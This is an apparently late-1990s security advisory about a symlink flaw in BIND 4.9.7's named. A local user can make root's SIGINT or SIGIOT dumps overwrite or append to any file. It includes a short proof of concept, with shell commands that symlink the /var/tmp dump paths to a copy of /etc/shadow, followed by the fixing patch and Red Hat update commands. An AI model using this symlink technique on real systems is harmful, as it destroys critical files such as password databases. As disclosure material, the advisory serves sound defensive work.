COMMAND
BIND
SYSTEMS AFFECTED
Systems running BIND 4.9.7
PROBLEM
Joe H. found following. The new named(8) happily follows symlinks
and clobbers any file on the system when it receives a SIGINT.
(Used for debugging and statistics gathering) SIGINT dumps the
named database to /var/tmp/named_dump.db. It will also happily
append data to any system file when it receives a SIGIOT. SIGIOT
appends named statistics to /var/tmp/named.stats. This problem is
probably recursive to previous versions of named but, it is not
confirmed. This was tested under RedHat 4.2 Linux 2.0.30 i586.
The in.named(8) man page mentions that sending a SIGINT to the
in.named process will dump the current data base and cache to, by
default, /var/tmp/named_dump.db. Some sites may find this useful
in looking for self-referential CNAMEs. Please see the
in.named(8) man page for further details. Quick check shows:
[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 992 Apr 10 12:52 junk.shadow
Now as a non-priv user..
[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout
(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is
toast...)
[root]# kill -SIGIOT [named.pid]
[root]# ls -al /etc/junk.shadow
-r-------- 1 root root 2251 Apr 10 13:00 /etc/junk.shadow
[root]# less /etc/junk.shadow
someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
+++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
2368 time since boot (secs)
2368 time since reset (secs)
0 Unknown query types
[SNIP]
The statistics dump gets appended to any file on the system. Now
for the real horror:
[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow
; Dumped at Fri Apr 10 13:02:40 1998
;; ++zone table++
[SNIP]
No trace of the original remains. Your shadow password file or
anything else on the system is fried.
SOLUTION
Since 4.9.7 is a security related patch anyway, this will be fixed
before declaring 4.9.7-REL. Mark Andrews posted patch that
addresses the issues and a few others by change 4.9.7 to do what
8.1.x does, i.e. use to directory specified in named.{boot,conf}
for temporaries and debug dumps:
*** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
--- named/ns_init.c Sun Apr 12 13:12:05 1998
***************
*** 560,567 ****
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "%s/NsTmp%ld.%d", _PATH_TMPDIR,
! (long)getpid(), tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
--- 560,567 ----
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
! tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
*** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
--- named/ns_main.c Sun Apr 12 14:51:45 1998
***************
*** 1463,1469 ****
dprintf(1, (ddt, "sigprof()\n"));
if (fork() == 0)
{
- (void) chdir(_PATH_TMPDIR);
exit(1);
}
errno = save_errno;
--- 1463,1468 ----
*** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
--- named/pathnames.h Sat Apr 11 10:57:45 1998
***************
*** 74,88 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "/var/tmp/named.run"
! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "/var/tmp/named.stats"
! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"
#else /* BSD */
--- 74,88 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"
#else /* BSD */
***************
*** 92,106 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "/usr/tmp/named.run"
! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "/usr/tmp/named.stats"
! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */
--- 92,106 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */
These problems affect users of Red Hat 4.2, 5.0, and 5.1. Red Hat
strongly suggests all users update to these new versions as soon
as possible. After upgrading to the new version of bind, be sure
to restart bind with:
/etc/rc.d/init.d/bind stop
/etc/rc.d/init.d/bind start
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/alpha/bind-4.9.7-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/sparc/bind-4.9.7-1.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/i386/bind-4.9.7-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/alpha/bind-4.9.7-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/bind-4.9.7-0.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/bind-4.9.7-0.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/bind-4.9.7-0.sparc.rpm